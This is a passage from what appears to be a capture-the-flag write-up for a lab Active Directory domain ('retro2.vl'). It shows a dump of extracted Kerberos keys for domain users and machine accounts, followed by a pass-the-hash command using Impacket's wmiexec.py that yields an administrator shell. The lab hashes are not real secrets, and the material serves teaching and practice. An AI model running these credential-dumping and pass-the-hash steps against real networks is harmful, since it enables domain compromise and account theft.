Rhys.Richards:aes128-cts-hmac-sha1-96:baeaf7d174ea76419d381e545935aef2
Rhys.Richards:des-cbc-md5:6b0e2cf7ae3de3e3
Leah.Robinson:aes256-cts-hmac-sha1-96:90848db193370cc832b199b27137ef581b78eddc2d5f635a0e01e0b1c514c326
Leah.Robinson:aes128-cts-hmac-sha1-96:6aa30b143db0f0e65517bb062a4fe6c7
Leah.Robinson:des-cbc-md5:d9b6abe30e851f9b
Michelle.Bird:aes256-cts-hmac-sha1-96:a76108bec6385a4469d5eff1d4d5ccaaf066b981d56d3df82f058c1b66b9c653
Michelle.Bird:aes128-cts-hmac-sha1-96:ca9fdc76c484d05397433e90c2d9b84c
Michelle.Bird:des-cbc-md5:79b016e69ec4b59b
Kayleigh.Stephenson:aes256-cts-hmac-sha1-96:6c11e6b4e5e263bbb7b6859b7e4380bf9fce222de2e51da9f033c370d1bd3b34
Kayleigh.Stephenson:aes128-cts-hmac-sha1-96:69ced3d12c16659ae2fdaa2bab6df2f3
Kayleigh.Stephenson:des-cbc-md5:ce7ae949452a1997
Charles.Singh:aes256-cts-hmac-sha1-96:0eb1f6abc867ac77603b9b6f8b454abfef421c6eec2518e28e0e40ee3efb6215
Charles.Singh:aes128-cts-hmac-sha1-96:3cee7675dd2615a5214127faacb30930
Charles.Singh:des-cbc-md5:9125dcd6d3ad4fb6
Sam.Humphreys:aes256-cts-hmac-sha1-96:878ea36ddce6a9e5b050021e757669ff94b8b3367bcb9461dc83cdbcc1342b77
Sam.Humphreys:aes128-cts-hmac-sha1-96:102e420c74d34cda602282342c555b72
Sam.Humphreys:des-cbc-md5:5b5bc1a8683816c4
Margaret.Austin:aes256-cts-hmac-sha1-96:500b6f66a68c384b76ee63fb2d309278638c4eaa2903a7555b7f0a63ed2da30e
Margaret.Austin:aes128-cts-hmac-sha1-96:2bb2066bea0481bf7c9fae65a908bb64
Margaret.Austin:des-cbc-md5:077f91679bcb6dda
Caroline.James:aes256-cts-hmac-sha1-96:0ddabfe9574396df083878375b0e7100c4466698a1d0fa812a07b0bc17f44583
Caroline.James:aes128-cts-hmac-sha1-96:574766e01691af43749a8c0cc566af0f
Caroline.James:des-cbc-md5:29574998cd13f813
Lynda.Giles:aes256-cts-hmac-sha1-96:dc9ca6bdfd27960e9c5700864e0fec0a388f903747d79c61d773cc6e24ea2253
Lynda.Giles:aes128-cts-hmac-sha1-96:c2eaf2f31cb78d18ac51c1c8b0cd496d
Lynda.Giles:des-cbc-md5:62b9082f6e1ab92a
Emily.Price:aes256-cts-hmac-sha1-96:37d0c3e846f44b0c0afe005b178c1e2689ab8cf227c60345e4d83af3bedcd908
Emily.Price:aes128-cts-hmac-sha1-96:87331a1b619dc0b817a00bd7882973b3
Emily.Price:des-cbc-md5:d592c7dce0386489
Lynne.Dennis:aes256-cts-hmac-sha1-96:ec46f167dac2f0763fa4891b4ec7204e8b791b6e757b88f13eaf0a3069d91520
Lynne.Dennis:aes128-cts-hmac-sha1-96:a6de42302e21936f728c6340cc3924b4
Lynne.Dennis:des-cbc-md5:2337fe088083d561
Alexandra.Black:aes256-cts-hmac-sha1-96:63e7bcd8c3827fafac984927c8ee7a410644603b87df03a73d93a5d83d351199
Alexandra.Black:aes128-cts-hmac-sha1-96:f7f77113ff7a8e070f8d961a973afa80
Alexandra.Black:des-cbc-md5:70dcdcef4a584c67
Alex.Scott:aes256-cts-hmac-sha1-96:56e28035bf0e773b08eac63f2ded3b77150f4662335fecfe0d167439954c3c6c
Alex.Scott:aes128-cts-hmac-sha1-96:1743a9bfda5a6d4937e10833aa94261a
Alex.Scott:des-cbc-md5:c47a9e6475452f7c
Mandy.Davies:aes256-cts-hmac-sha1-96:f9ab0b0127d819088c6e20f2a22b62e658e65413634a982e7a03029860b5fbbb
Mandy.Davies:aes128-cts-hmac-sha1-96:775c402ad1b82a01d00d24cdce2f0cff
Mandy.Davies:des-cbc-md5:0dcb62cd49a4070b
Marilyn.Whitehouse:aes256-cts-hmac-sha1-96:070d0ec84b01cee1f4e6f7fde70978e38dd06e9718d29165f7b34687f2bfc57d
Marilyn.Whitehouse:aes128-cts-hmac-sha1-96:983446f761745cac59cfdf6533be1e62
Marilyn.Whitehouse:des-cbc-md5:b34fad80d6583d52
Lindsey.Harrison:aes256-cts-hmac-sha1-96:df8a640121c7931e4b1e24a903831bbdb2ceca342bc32df0d642be5ad59aebaa
Lindsey.Harrison:aes128-cts-hmac-sha1-96:9c0600e456143cb3a958434295e230c5
Lindsey.Harrison:des-cbc-md5:df4afde6a83d586d
Sally.Davey:aes256-cts-hmac-sha1-96:ad994860516e89a93515d9934fbc92ae0e18ac10a4179ce0b5e856d21239c07d
Sally.Davey:aes128-cts-hmac-sha1-96:1bd25ea0251be749c0b9ff10c0443728
Sally.Davey:des-cbc-md5:8940a2cde9fb45f1
retro2.vl\inventory:aes256-cts-hmac-sha1-96:251d2610ccb122fbefecbc0bad2a0f1ecffe39e48734d40fc31f9d6c32d9c3a6
retro2.vl\inventory:aes128-cts-hmac-sha1-96:6a4787b610d341b0d99758c8dd80a405
retro2.vl\inventory:des-cbc-md5:ad08041f6b0861a7
retro2.vl\ldapreader:aes256-cts-hmac-sha1-96:1f38605e159b9f10ba465530aa4ea2d9fd5429b3bf348fa8559b5acc647c0b32
retro2.vl\ldapreader:aes128-cts-hmac-sha1-96:000256e0522cc3cd2f52c6bfe1698368
retro2.vl\ldapreader:des-cbc-md5:8908762379fdfdae
BLN01$:aes256-cts-hmac-sha1-96:ffd22246332c76f0831bbae3acbcf7d9160e780f77ecbf6322ec536b8744a280
BLN01$:aes128-cts-hmac-sha1-96:00489881457ca7f5ba4dac2e1395fd44
BLN01$:des-cbc-md5:0886138c15a70157
ADMWS01$:aes256-cts-hmac-sha1-96:77bc7578e4acc75c4f357c41584310ab8c659768200785b0a02db6056fe1d2cd
ADMWS01$:aes128-cts-hmac-sha1-96:e8e055a2f04a9c23a608f9e7f5676b2b
ADMWS01$:des-cbc-md5:32efae925d46310b
FS01$:aes256-cts-hmac-sha1-96:c2d3478014ac16cda2a093ffa710f57939ea47c022aa0bd4cec840b2fc313b42
FS01$:aes128-cts-hmac-sha1-96:260e51b22e8694ed4c8d229bb3f18aeb
FS01$:des-cbc-md5:85df2686e95bdf92
FS02$:aes256-cts-hmac-sha1-96:fcceafa1335a9e262a1e4532d516011d4e8b80ae7f35fb35714a2a6410db18bc
FS02$:aes128-cts-hmac-sha1-96:5f2c27f494ab454d875057c909790e3e
FS02$:des-cbc-md5:252afd385b04b0bf
[*] Cleaning up...
Shell
With the administrator hash, I can get a shell as Administrators using wmiexec.py from Impacket:
oxdf@hacky$ wmiexec.py -hashes :c06552bdb50ada21a7c74536c231b848 retro2.vl/administrator@bln01.retro2.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
retro2\administrator